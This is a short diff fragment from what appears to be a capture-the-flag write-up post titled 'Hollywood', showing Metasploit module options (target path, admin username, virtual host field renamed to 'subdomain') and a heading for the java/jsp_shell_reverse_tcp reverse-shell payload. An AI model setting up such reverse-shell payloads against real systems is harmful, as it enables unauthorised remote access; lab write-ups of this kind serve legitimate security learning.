StrongShiv8/strongshiv8.github.io/_posts/2023-10-10-Hollywood.md

-   SSL        false                  no        Negotiate SSL/TLS for outgoing connections TARGETURI  /                      yes       The base path to the web application USERNAME   admin                  yes       Username to authenticate with VHOST                             no        HTTP server virtual host
+   SSL        false                  no        Negotiate SSL/TLS for outgoing connections TARGETURI  /                      yes       The base path to the web application USERNAME   admin                  yes       Username to authenticate with subdomain                             no        HTTP server virtual host

 Payload options (java/jsp_shell_reverse_tcp):